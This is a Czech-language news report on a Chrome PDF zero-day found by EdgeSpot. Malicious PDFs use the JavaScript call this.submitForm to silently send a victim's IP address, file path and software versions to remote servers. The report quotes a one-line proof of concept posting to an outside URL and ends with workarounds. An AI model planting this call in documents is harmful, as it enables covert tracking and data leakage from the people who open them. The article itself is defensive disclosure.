Služba detekce zneužití EdgeSpot objevil zajímavou zranitelnost prohlížeče Chrome v nulovém dni využívající dokumenty PDF. Tato chyba zabezpečení umožňuje útočníkům shromažďovat citlivá data pomocí škodlivých dokumentů PDF otevřených v prohlížeči Chrome.

Jakmile oběť otevře příslušné soubory PDF v prohlížeči Google Chrome, začne škodlivý program na pozadí pracovat shromažďováním uživatelských dat.

Data jsou pak předána na vzdálený server, který je řízen hackery. Možná vás zajímá, jaká data útočníci nasávají, zacílí na následující data na vašem počítači:

• IP adresa
• Úplná cesta k souboru PDF v systému
• Verze OS a Chrome

Dejte si pozor na soubory PDF s malwarem

Možná vás překvapí, že se při otevírání souborů PDF nic neděje. Požadavky HTTP POST se navíc používají k přenosu dat na vzdálené servery bez zásahu uživatele.

Odborníci zjistili, že data přijímala jedna ze dvou domén readnotifycom nebo burpcollaboratornet.

Intenzitu útoku si dokážete představit tím, že většina antivirového softwaru nedokáže detekovat vzorky detekované EdgeSpotem.

Odborníci odhalují, že útočníci používají API Javascript PDF „this.submitForm ()“ pro shromažďování citlivých informací uživatelů.

Testovali jsme to s minimálním PoC, jednoduché volání API jako „this.submitForm ('http://google.com/test')“ způsobí, že Google Chrome odešle osobní údaje na google.com.

Odborníci ve skutečnosti zjistili, že tuto chybu v prohlížeči Chrome využívají dvě odlišné sady škodlivých souborů PDF. Oba byly rozeslány v říjnu 2017 a září 2018.

Sbíraná data mohou útočníci využít zejména k doladění útoků v budoucnosti. Zprávy naznačují, že první dávka souborů byla sestavena pomocí služby ReadNotify pro sledování PDF.

Uživatelé mohou službu využít ke sledování uživatelských názorů. EdgeSpot nesdílí žádné podrobnosti týkající se povahy druhé sady souborů PDF.

Jak zůstat chráněni

Služba detekce zneužití EdgeSpot chtěla upozornit uživatele prohlížeče Chrome na možná rizika, protože oprava se neočekává, že bude vydána v blízké budoucnosti.

Společnost EdgeSpot minulý rok společnosti Google informovala o této chybě zabezpečení a společnost slíbila vydání opravy na konci dubna. H

V každém případě můžete zvážit použití dočasného řešení problému lokálním prohlížením přijatých dokumentů PDF pomocí alternativní aplikace pro čtení PDF.

Případně můžete také otevřít své dokumenty PDF v prohlížeči Chrome odpojením systémů od Internetu. Mezitím můžete počkat na aktualizaci prohlížeče Chrome 74, která by měla být spuštěna 23. dubna.